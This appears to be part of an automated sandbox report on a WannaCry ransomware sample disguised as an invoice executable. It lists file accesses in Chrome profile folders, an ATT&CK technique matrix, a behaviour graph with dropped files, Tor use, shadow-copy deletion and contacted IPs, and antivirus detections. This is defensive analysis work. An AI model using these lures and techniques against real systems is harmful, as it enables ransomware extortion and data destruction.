            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\~SD1F44.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\~SD9501.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\~SD94D0.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable\~SD950A.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\~SD1F32.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\~SD1F2C.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\~SD1F2F.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\~SD94B0.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\~SD94CD.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome\~SD9503.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\~SD94A8.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable\~SD9502.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\~SD1F2B.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\~SD948D.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\~SD948F.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\~SD94E8.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\~SD94AA.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\~SD94C3.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\~SD94C4.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\~SD94AF.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\~SD94A2.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir\~SD94C9.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\~SD94C1.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome\~SD951A.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\a7dd23ff-bd8a-4774-b81c-93fccb341274\~SD1F2A.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\~SD1F33.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\~SD9520.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable\~SD9506.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\~SD1F45.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\~SD94E6.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\~SD94FC.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\~SD1F30.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\~SD94E2.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\~SD94A7.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable\~SD94EA.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\~SD9508.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\~SD94A1.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\~SD94A3.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\~SD1F2E.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome\~SD951E.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable\~SD951D.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\~SD9500.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\~SD94C5.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\~SD1F34.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\~SD94E5.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\~SD94E9.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome\~SD94FB.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome\~SD9507.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\~SD1F4A.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\~SD1F31.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\~SD94CA.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\~SD1F47.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\~SD94E7.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\~SD94E3.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\~SD948E.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\~SD94E4.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\~SD1F2D.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable\~SD94FE.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\~SD94C7.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\~SD9509.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\~SD94C8.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\~SD94AC.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\~SD94AB.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\~SD1F49.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\~SD9505.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\~SD951C.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\~SD94CF.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\~SD94AE.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\~SD1F48.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\~SD94FD.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\~SD94A9.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir\~SD94CB.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\~SD94A6.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\~SD1F29.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\~SD1F28.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\~SD94C2.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\~SD1F27.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\~SD1F46.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\~SD94CE.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\~SD94A5.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\~SD94A4.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\~SD94AD.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\~SD9504.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\~SD94C0.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\~SD951F.tmpJump to behavior
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEC2C90 ENGINE_add_conf_module,CONF_module_add,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,ENGINE_get_ex_data,ERR_put_error,ENGINE_get_ex_new_index,CRYPTO_lock,CRYPTO_lock,CRYPTO_malloc,sk_new_null,CRYPTO_lock,ENGINE_get_ex_data,CRYPTO_lock,sk_free,CRYPTO_free,ERR_put_error,DSO_new,sk_num,sk_value,DSO_merge,DSO_load,CRYPTO_free,ERR_put_error,DSO_free,CRYPTO_free,BUF_strdup,CRYPTO_free,BUF_strdup,ERR_put_error,CRYPTO_free,CRYPTO_free,DSO_load,DSO_bind_func,DSO_bind_func,ENGINE_get_static_state,ERR_get_implementation,CRYPTO_get_ex_data_implementation,CRYPTO_get_mem_functions,CRYPTO_get_locking_callback,CRYPTO_get_add_lock_callback,CRYPTO_get_dynlock_create_callback,CRYPTO_get_dynlock_lock_callback,CRYPTO_get_dynlock_destroy_callback,ENGINE_add,ERR_put_error,BUF_strdup,sk_insert,DSO_convert_filename,ENGINE_set_ex_data,CRYPTO_lock,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_free,DSO_free,ERR_put_error,DSO_free,ERR_put_error,ERR_put_error,CRYPTO_free,ERR_clear_error,DSO_free,ERR_put_error,__stack_chk_fail,__stack_chk_fail,ENGINE_load_dynamic,ENGINE_new,ENGINE_set_id,ENGINE_set_name,ENGINE_free,86_2_6CEC2C90

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
            Valid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		12
            Scripting            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services12
            Archive Collected Data            		Exfiltration Over Other Network Medium22
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization21
            Data Encrypted for Impact            		Acquire InfrastructureGather Victim Identity Information
            Default Accounts12
            Scripting            		1
            Browser Extensions            		11
            Process Injection            		2
            Obfuscated Files or Information            		LSASS Memory1
            Account Discovery            		Remote Desktop Protocol1
            Browser Session Hijacking            		Exfiltration Over Bluetooth2
            Multi-hop Proxy            		SIM Card SwapObtain Device Cloud Backups1
            Inhibit System Recovery            		DomainsCredentials
            Domain Accounts2
            Native API            		1
            Registry Run Keys / Startup Folder            		1
            Registry Run Keys / Startup Folder            		1
            DLL Side-Loading            		Security Account Manager3
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		Automated Exfiltration1
            Application Layer Protocol            		Data Encrypted for ImpactDNS ServerEmail Addresses
            Local Accounts12
            Command and Scripting Interpreter            		1
            Services File Permissions Weakness            		1
            Services File Permissions Weakness            		1
            File Deletion            		NTDS16
            System Information Discovery            		Distributed Component Object ModelInput CaptureTraffic Duplication2
            Proxy            		Data DestructionVirtual Private ServerEmployee Names
            Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
            Masquerading            		LSA Secrets221
            Security Software Discovery            		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
            Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Modify Registry            		Cached Domain Credentials11
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
            External Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Virtualization/Sandbox Evasion            		DCSync2
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
            Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
            Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Hidden Files and Directories            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
            Supply Chain CompromisePowerShellCronCron1
            Services File Permissions Weakness            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses
            Compromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
            Rundll32            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingExfiltration Over Unencrypted Non-C2 ProtocolMail ProtocolsFirmware CorruptionDomainsNetwork Security Appliances

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1375296 Sample: Request for Quotation (RFQ_... Startdate: 16/01/2024 Architecture: WINDOWS Score: 100 89 Detected Wannacry Ransomware 2->89 91 Malicious sample detected (through community Yara rule) 2->91 93 Antivirus detection for dropped file 2->93 95 10 other signatures 2->95 9 Proforma Invoice and Bank swift-REG.PI-0086547654.exe 1 501 2->9         started        13 7zG.exe 1 2->13         started        15 7zG.exe 1 2->15         started        17 rundll32.exe 2->17         started        process3 file4 69 C:\Users\user\Downloads\@WanaDecryptor@.exe, PE32 9->69 dropped 71 C:\Users\user\Documents\@WanaDecryptor@.exe, PE32 9->71 dropped 73 C:\Users\user\Desktop\u.wnry, PE32 9->73 dropped 79 305 other malicious files 9->79 dropped 117 Creates files in the recycle bin to hide itself 9->117 119 Moves itself to temp directory 9->119 121 Found Tor onion address 9->121 123 5 other signatures 9->123 19 @WanaDecryptor@.exe 9->19         started        24 cmd.exe 9->24         started        26 cmd.exe 9->26         started        28 179 other processes 9->28 75 C:\...\Request for Quotation (RFQ_196).zip, data 13->75 dropped 77 Proforma Invoice a...G.PI-0086547654.exe, PE32 15->77 dropped signatures5 process6 dnsIp7 81 127.0.0.1 unknown unknown 19->81 59 C:\Users\user\Desktop\TaskData\...\zlib1.dll, PE32 19->59 dropped 61 C:\Users\user\Desktop\TaskData\Tor\tor.exe, PE32 19->61 dropped 63 C:\Users\user\Desktop\...\taskhsvc.exe, PE32 19->63 dropped 67 7 other malicious files 19->67 dropped 99 Multi AV Scanner detection for dropped file 19->99 101 Installs TOR (Internet Anonymizer) 19->101 103 Found Tor onion address 19->103 111 2 other signatures 19->111 30 taskhsvc.exe 19->30         started        65 C:\Users\user\Desktop\m.vbs, ASCII 24->65 dropped 105 Command shell drops VBS files 24->105 107 Uses cmd line tools excessively to alter registry or file data 24->107 109 Deletes shadow drive data (may be related to ransomware) 24->109 33 conhost.exe 24->33         started        35 cscript.exe 24->35         started        37 @WanaDecryptor@.exe 26->37         started        40 conhost.exe 26->40         started        42 conhost.exe 28->42         started        44 conhost.exe 28->44         started        46 conhost.exe 28->46         started        48 reg.exe 28->48         started        file8 signatures9 process10 dnsIp11 83 80.127.137.19, 443, 49728 XS4ALL-NLAmsterdamNL Netherlands 30->83 85 78.142.142.246, 443, 49730 UTA-ASAT Austria 30->85 87 3 other IPs or domains 30->87 50 conhost.exe 30->50         started        113 Found Tor onion address 37->113 115 Deletes shadow drive data (may be related to ransomware) 37->115 52 cmd.exe 37->52         started        signatures12 process13 signatures14 97 Deletes shadow drive data (may be related to ransomware) 52->97 55 conhost.exe 52->55         started        57 WMIC.exe 52->57         started        process15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\@WanaDecryptor@.exe.lnk100%AviraLNK/Runner.VPDJ
            C:\Users\user\Desktop\@WanaDecryptor@.exe96%ReversingLabsWin32.Ransomware.WannaCry
            C:\Users\user\Desktop\@WanaDecryptor@.exe90%VirustotalBrowse
            C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe92%ReversingLabsWin32.Ransomware.WannaCry
            C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe94%VirustotalBrowse
            C:\Users\user\Desktop\TaskData\Tor\libeay32.dll0%ReversingLabs
            C:\Users\user\Desktop\TaskData\Tor\libeay32.dll0%VirustotalBrowse
            C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dll0%ReversingLabs
            C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dll0%VirustotalBrowse
            C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll0%ReversingLabs
            C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll0%VirustotalBrowse
            C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll0%ReversingLabs
            C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll0%VirustotalBrowse
            C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dll0%ReversingLabs
